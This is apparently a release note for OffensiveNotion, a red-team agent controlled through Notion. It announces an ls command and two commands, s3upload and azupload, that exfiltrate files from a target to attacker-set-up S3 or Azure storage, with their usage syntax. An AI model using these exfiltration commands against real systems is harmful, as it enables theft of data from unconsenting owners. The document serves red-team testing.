v1.4.0: "Toledo"
Welcome back! In v1.4.0
, aka "Toledo", we wanted to add some much-needed features to ON.
ls
At long last, ls
is now a native command! You can enumerate directories without needing to resort to the shell.
Cloud Upload
Finally! A way to exfiltrate data from the target. It turns out Notion has no native file upload capability. What the Notion app does in the background is hand the file off to S3, where it will eventually reside. So to get uploads working in OffensiveNotion, we've implemented cloud upload ourselves in 2 commands: s3upload
and azupload
, supporting S3 and Azure Blob Storage, respectively.
Now, to use these, there's a bit of preparation necessary and the commands require some sensitive information to be send to the agent. But we don't store that information in memory after the commands have been run. That makes the commands more verbose, but also more OPSEC safe.
azupload
Usage: azupload storage_account access_key container_name file
To use Azure Storage, you'll need to create an Azure Storage Account with public access enabled. Then a container that allows anonymous read. You don't technically have to do use anonymous read; it'll just make the links in ON easier to follow. But if you want to maintain better access control, the upload will still function.
s3upload
Usage: s3upload aws_access_key_id aws_secret_access_key region bucket_name file
For S3, you'll want to create an IAM user with S3 write permissions for a new bucket. The access key ID and secret access key are sent, along with the region, bucket name, and the file to upload. The file is set with an anonymous read ACL for ease of access, so beware of the URL and who is accessing it!